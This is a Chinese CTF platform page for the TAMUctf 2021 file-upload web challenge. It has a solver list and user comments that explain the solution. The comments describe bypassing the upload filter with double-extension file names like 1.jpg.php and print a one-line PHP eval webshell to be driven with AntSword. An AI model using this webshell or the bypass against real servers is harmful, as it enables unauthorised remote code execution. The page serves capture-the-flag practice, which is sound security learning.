uphploadWEB 未解决

分数: 0 金币: 0
所属赛事: TAMUctf 2021
题目作者: 未知
一  血: niano.0
一血奖励: 0金币
解  决: 129
提  示:
描  述:
I made a website to collect reaction images, feel free to upload some! (provide them the ip, if you're following the setup to test the challgenge it would be the ip of the machine running the docker container)
评论
dir_tree 1年前

检测是从左到右利用中间件解析规则从右到左绕过检测,成功解析php文件,上传一个phpinfo,在里面有flag

回复 0

gooddemo 2年前

先定义一个文件1.jpg.php,在这个文件里面写入一句话木马<?php @eval($_POST['hack']); ?>,通过upload上传该文件,然后通过蚁剑连接,在根路径找到/flag_is_here/flag.txt

回复 0

18655201958 2年前

flag 在根目录

回复 0

206297162 2年前

兄弟们双写绕过 在1.jpg.php

回复 0

WriteUp

image
niano.0

2 金币

评分(0)

暂无评分

解题动态

mechatengo 攻破了该题 17小时前
pinus 攻破了该题 7天前
Dxmax 攻破了该题 7天前
xiaodou 攻破了该题 11天前
最爱超级大芒果 攻破了该题 12天前
jibabenba 攻破了该题 16天前
zant 攻破了该题 19天前
Yuelan 攻破了该题 20天前
caixinggang 攻破了该题 20天前
steven615 攻破了该题 21天前
Vluae 攻破了该题 23天前
vx606v 攻破了该题 27天前
Mu'S'iC 攻破了该题 28天前
hell0-hnc 攻破了该题 1月前
hdcc1 攻破了该题 1月前
yehlg 攻破了该题 1月前
get/post 攻破了该题 2月前
JNDJ 攻破了该题 3月前
xyjwkg 攻破了该题 3月前
HamiLemon 攻破了该题 3月前
问题反馈